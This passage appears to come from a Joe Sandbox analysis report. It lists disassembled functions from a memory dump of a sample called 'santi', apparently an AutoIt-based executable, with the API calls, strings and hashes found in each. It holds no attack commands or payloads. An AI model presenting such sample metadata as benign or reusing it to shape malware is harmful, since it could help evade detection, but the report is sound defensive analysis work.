                                                                • SetWindowTextW.USER32(00000000,?), ref: 0031EAF4
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0031EB04
                                                                • SetWindowTextW.USER32(00000000,?), ref: 0031EB0A
                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0031EB2B
                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0031EB45
                                                                • GetWindowRect.USER32(?,?), ref: 0031EB4E
                                                                • SetWindowTextW.USER32(?,?), ref: 0031EBB9
                                                                • GetDesktopWindow.USER32 ref: 0031EBBF
                                                                • GetWindowRect.USER32(00000000), ref: 0031EBC6
                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0031EC12
                                                                • GetClientRect.USER32(?,?), ref: 0031EC1F
                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0031EC44
                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0031EC6F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                • String ID:
                                                                • API String ID: 3869813825-0
                                                                • Opcode ID: e5bbf0adee708344d3d1da986592bc0c1ddfffb2303b4f63d8f1a540a35ebeff
                                                                • Instruction ID: 94e6ddf60de77aef3c7d1844fa032d3f08a5911f757d7b6f4da55e51267e12a8
                                                                • Opcode Fuzzy Hash: e5bbf0adee708344d3d1da986592bc0c1ddfffb2303b4f63d8f1a540a35ebeff
                                                                • Instruction Fuzzy Hash: C4516071904709AFDB26DFA8CD89FAEBBF9FF08704F008518E546A25A0C775A944CB10
                                                                Function 003379B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 003379C6
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 003379D1
                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 003379DC
                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 003379E7
                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 003379F2
                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 003379FD
                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00337A08
                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00337A13
                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00337A1E
                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00337A29
                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00337A34
                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00337A3F
                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00337A4A
                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00337A55
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00337A60
                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00337A6B
                                                                • GetCursorInfo.USER32(?), ref: 00337A7B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Cursor$Load$Info
                                                                • String ID:
                                                                • API String ID: 2577412497-0
                                                                • Opcode ID: 61ecd1d7cdefb5073cfab425ac1b758b030d3f0c7eda881256158f41c1afceb4
                                                                • Instruction ID: 95e968441aa09d0a8e3fe4c6bf4e4b02649655f071b47572fe4a4a9ea5d48499
                                                                • Opcode Fuzzy Hash: 61ecd1d7cdefb5073cfab425ac1b758b030d3f0c7eda881256158f41c1afceb4
                                                                • Instruction Fuzzy Hash: CC3107B1D4831EAADB619FB68C8995FBFE8FF04750F504526E50DE7280DA78A5008F91
                                                                Function 002EC833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002EC8B7,?,00002000,?,?,00000000,?,002E419E,?,?,?,0037DC00), ref: 002FE984
                                                                  • Part of subcall function 002E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E53B1,?,?,002E61FF,?,00000000,00000001,00000000), ref: 002E662F
                                                                • __wsplitpath.LIBCMT ref: 002EC93E
                                                                  • Part of subcall function 00301DFC: __wsplitpath_helper.LIBCMT ref: 00301E3C
                                                                • _wcscpy.LIBCMT ref: 002EC953
                                                                • _wcscat.LIBCMT ref: 002EC968
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 002EC978
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 002ECABE
                                                                  • Part of subcall function 002EB337: _wcscpy.LIBCMT ref: 002EB36F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                • API String ID: 2258743419-1018226102
                                                                • Opcode ID: 0cdca449ac883ae79c5916da44194601f0fe9ab3584af495f4412d5b36a8fe1b
                                                                • Instruction ID: ee42aa22778d70c21f60549512831e0d292d931ccf7c221d340a30e7a1de3990
                                                                • Opcode Fuzzy Hash: 0cdca449ac883ae79c5916da44194601f0fe9ab3584af495f4412d5b36a8fe1b
                                                                • Instruction Fuzzy Hash: 6112E0710183819FC726EF65C841AAFBBE4BF88344F50482EF98997261DB30DA59CF52
                                                                Function 0034CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 0034CEFB
                                                                • DestroyWindow.USER32(?,?), ref: 0034CF73
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0034CFF4
                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0034D016
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0034D025
                                                                • DestroyWindow.USER32(?), ref: 0034D042
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,002E0000,00000000), ref: 0034D075
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0034D094
                                                                • GetDesktopWindow.USER32 ref: 0034D0A9
                                                                • GetWindowRect.USER32(00000000), ref: 0034D0B0
                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0034D0C2
                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0034D0DA
                                                                  • Part of subcall function 002FB526: GetWindowLongW.USER32(?,000000EB), ref: 002FB537
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                • String ID: 0$tooltips_class32
                                                                • API String ID: 3877571568-3619404913
                                                                • Opcode ID: c91e12618f0b4d81a5aa7fb64a04dc6ee70f2c8db7f92687daac1aee3b05e406
                                                                • Instruction ID: 528690ffc1302d6758a148e9d3e946d17fe930debbdb1a1d0c26a86b65713600
                                                                • Opcode Fuzzy Hash: c91e12618f0b4d81a5aa7fb64a04dc6ee70f2c8db7f92687daac1aee3b05e406
                                                                • Instruction Fuzzy Hash: AA71DFB5640305AFD722CF28CC85FAA77E9FB89704F48451DF9858B2A1D774E942CB22
                                                                Function 0034F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • DragQueryPoint.SHELL32(?,?), ref: 0034F37A
                                                                  • Part of subcall function 0034D7DE: ClientToScreen.USER32(?,?), ref: 0034D807
                                                                  • Part of subcall function 0034D7DE: GetWindowRect.USER32(?,?), ref: 0034D87D
                                                                  • Part of subcall function 0034D7DE: PtInRect.USER32(?,?,0034ED5A), ref: 0034D88D
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0034F3E3
                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0034F3EE
                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0034F411
                                                                • _wcscat.LIBCMT ref: 0034F441
                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0034F458
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0034F471
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0034F488
                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 0034F4AA
                                                                • DragFinish.SHELL32(?), ref: 0034F4B1
                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0034F59C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                • API String ID: 169749273-3440237614
                                                                • Opcode ID: 46486228613636cbc51cee61c91bfb573aebed6fc20406b30972594d2c7f3fdd
                                                                • Instruction ID: 127a1d87f34f2d0874c0722377a89def2d3bbb7c28e7f0a02a592d731f58834e
                                                                • Opcode Fuzzy Hash: 46486228613636cbc51cee61c91bfb573aebed6fc20406b30972594d2c7f3fdd
                                                                • Instruction Fuzzy Hash: 27617A71508300AFC302EF65CC85DAFBBF8EF89710F444A1EF695961A1DB70AA19CB52
                                                                Function 0032AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • VariantInit.OLEAUT32(00000000), ref: 0032AB3D
                                                                • VariantCopy.OLEAUT32(?,?), ref: 0032AB46
                                                                • VariantClear.OLEAUT32(?), ref: 0032AB52
                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0032AC40
                                                                • __swprintf.LIBCMT ref: 0032AC70
                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0032AC9C
                                                                • VariantInit.OLEAUT32(?), ref: 0032AD4D
                                                                • SysFreeString.OLEAUT32(00000016), ref: 0032ADDF
                                                                • VariantClear.OLEAUT32(?), ref: 0032AE35
                                                                • VariantClear.OLEAUT32(?), ref: 0032AE44
                                                                • VariantInit.OLEAUT32(00000000), ref: 0032AE80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                • API String ID: 3730832054-3931177956
                                                                • Opcode ID: 5922b2d4fbc2a8d9e750a7e60ab2ecd6a374c36f1876055be34abfbd26c43c91
                                                                • Instruction ID: f1114e9e9f49e2c70d9d5f401933e4b530145b1450b4eecaf4b12758c0ae9e6c
                                                                • Opcode Fuzzy Hash: 5922b2d4fbc2a8d9e750a7e60ab2ecd6a374c36f1876055be34abfbd26c43c91
                                                                • Instruction Fuzzy Hash: 0AD12371A00A25DBDF229F65E884B7EF7B9FF04B00F1584A6E4159B580DB70EC50DBA2
                                                                Function 0034716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 003471FC
                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00347247
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharMessageSendUpper
                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                • API String ID: 3974292440-4258414348
                                                                • Opcode ID: f09f63f61138b44aee164d84746e9755679c358c2373943dc9fc0ff95ef4adb3
                                                                • Instruction ID: 37b41685db73d8045a0ef319257c6017bb6c321712a85826940676e076ba99e6
                                                                • Opcode Fuzzy Hash: f09f63f61138b44aee164d84746e9755679c358c2373943dc9fc0ff95ef4adb3
                                                                • Instruction Fuzzy Hash: D9918D342187419BCB06EF20C851A6EB7E5BF94350F014869F9966B3A3DB70FD5ACB81
                                                                Function 0031CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnumChildWindows.USER32(?,0031CF50), ref: 0031CE90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ChildEnumWindows
                                                                • String ID: 4+9$CLASS$CLASSNN$H+9$INSTANCE$L+9$NAME$P+9$REGEXPCLASS$T+9$TEXT
                                                                • API String ID: 3555792229-3904986593
                                                                • Opcode ID: a16ae9536245cec5bbc2afb78e338d98834c06dbe0bac688d86ef61425748a34
                                                                • Instruction ID: c62dbbd63372726731c29cd854bbd77914f4cd0a5ad8b95baeaf2367015984e5
                                                                • Opcode Fuzzy Hash: a16ae9536245cec5bbc2afb78e338d98834c06dbe0bac688d86ef61425748a34
                                                                • Instruction Fuzzy Hash: 1591D93065050AABCF1EDF60C481BEAFB75BF08340F519529E949A7191DF3069EACBE0
                                                                Function 0034E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0034E5AB
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0034BEAF), ref: 0034E607
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0034E647
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0034E68C
                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0034E6C3
                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0034BEAF), ref: 0034E6CF
                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0034E6DF
                                                                • DestroyIcon.USER32(?,?,?,?,?,0034BEAF), ref: 0034E6EE
                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0034E70B
                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0034E717
                                                                  • Part of subcall function 00300FA7: __wcsicmp_l.LIBCMT ref: 00301030
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                • String ID: .dll$.exe$.icl
                                                                • API String ID: 1212759294-1154884017
                                                                • Opcode ID: 59942d2e0b5c5d4bbcbde85f7012b9ceef2902f0a87770fc82cc4bf3bcb0a36a
                                                                • Instruction ID: 22d3a141b3f4d8482b2d2f7fc9d3efb2c7e99870cf4d076b3c6bdf655c7155e4
                                                                • Opcode Fuzzy Hash: 59942d2e0b5c5d4bbcbde85f7012b9ceef2902f0a87770fc82cc4bf3bcb0a36a
                                                                • Instruction Fuzzy Hash: BE61D171A40215BAEB26DF64CC46FFE77ACBB19714F118105F911EA0D1EBB4E990CB60
                                                                Function 0032D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • CharLowerBuffW.USER32(?,?), ref: 0032D292
                                                                • GetDriveTypeW.KERNEL32 ref: 0032D2DF
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0032D327
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0032D35E
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0032D38C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                • API String ID: 1148790751-4113822522
                                                                • Opcode ID: b15e08f68f693613cea2d2fa8f1142845208a6954ddfe26c4d641d3f0da6a5d8
                                                                • Instruction ID: 3a1e45edda152c6d4b9c021a0a59cd0afe5d6919e706d16d6bdb463b89a062c7
                                                                • Opcode Fuzzy Hash: b15e08f68f693613cea2d2fa8f1142845208a6954ddfe26c4d641d3f0da6a5d8
                                                                • Instruction Fuzzy Hash: A9516B715143449FC701EF11C88196EB3E8EF98758F51886DF88A672A1DB31EE1ACF82
                                                                Function 003226BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00353973,00000016,0000138C,00000016,?,00000016,0037DDB4,00000000,?), ref: 003226F1
                                                                • LoadStringW.USER32(00000000,?,00353973,00000016), ref: 003226FA
                                                                • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00353973,00000016,0000138C,00000016,?,00000016,0037DDB4,00000000,?,00000016), ref: 0032271C
                                                                • LoadStringW.USER32(00000000,?,00353973,00000016), ref: 0032271F
                                                                • __swprintf.LIBCMT ref: 0032276F
                                                                • __swprintf.LIBCMT ref: 00322780
                                                                • _wprintf.LIBCMT ref: 00322829
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00322840
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                • API String ID: 618562835-2268648507
                                                                • Opcode ID: 1261a9ef504b2108f998bf746f23d606c0271f68e43c5f6275d519ad3ab32663
                                                                • Instruction ID: e323c7555f7926cf60f6df49d80d7900f9d2725ea3be9f96c404626a463034f6
                                                                • Opcode Fuzzy Hash: 1261a9ef504b2108f998bf746f23d606c0271f68e43c5f6275d519ad3ab32663
                                                                • Instruction Fuzzy Hash: 02415C72840258BACB16FBE1DD86DEFB778AF14344F900065F60576092EA74AF19CF60
                                                                Function 0032D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0032D0D8
                                                                • __swprintf.LIBCMT ref: 0032D0FA
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0032D137
                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0032D15C
                                                                • _memset.LIBCMT ref: 0032D17B
                                                                • _wcsncpy.LIBCMT ref: 0032D1B7
                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0032D1EC
                                                                • CloseHandle.KERNEL32(00000000), ref: 0032D1F7
                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0032D200
                                                                • CloseHandle.KERNEL32(00000000), ref: 0032D20A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                • String ID: :$\$\??\%s
                                                                • API String ID: 2733774712-3457252023
                                                                • Opcode ID: 5bcdd404db9024d75be07eb07c0ae1b60b36dc8cae2deff9251ca8ee1d1d0dcc
                                                                • Instruction ID: 36bcbd6bfd6ffb737d5925ad8a325dcf1d5c8b3da96f266b435d2a3fbf0add9c
                                                                • Opcode Fuzzy Hash: 5bcdd404db9024d75be07eb07c0ae1b60b36dc8cae2deff9251ca8ee1d1d0dcc
                                                                • Instruction Fuzzy Hash: BC319675A00219ABDB22DFA0DC49FEB77BCEF89741F1080B6F509D61A1E770D6458B24
                                                                Function 0034E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0034BEF4,?,?), ref: 0034E754
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0034BEF4,?,?,00000000,?), ref: 0034E76B
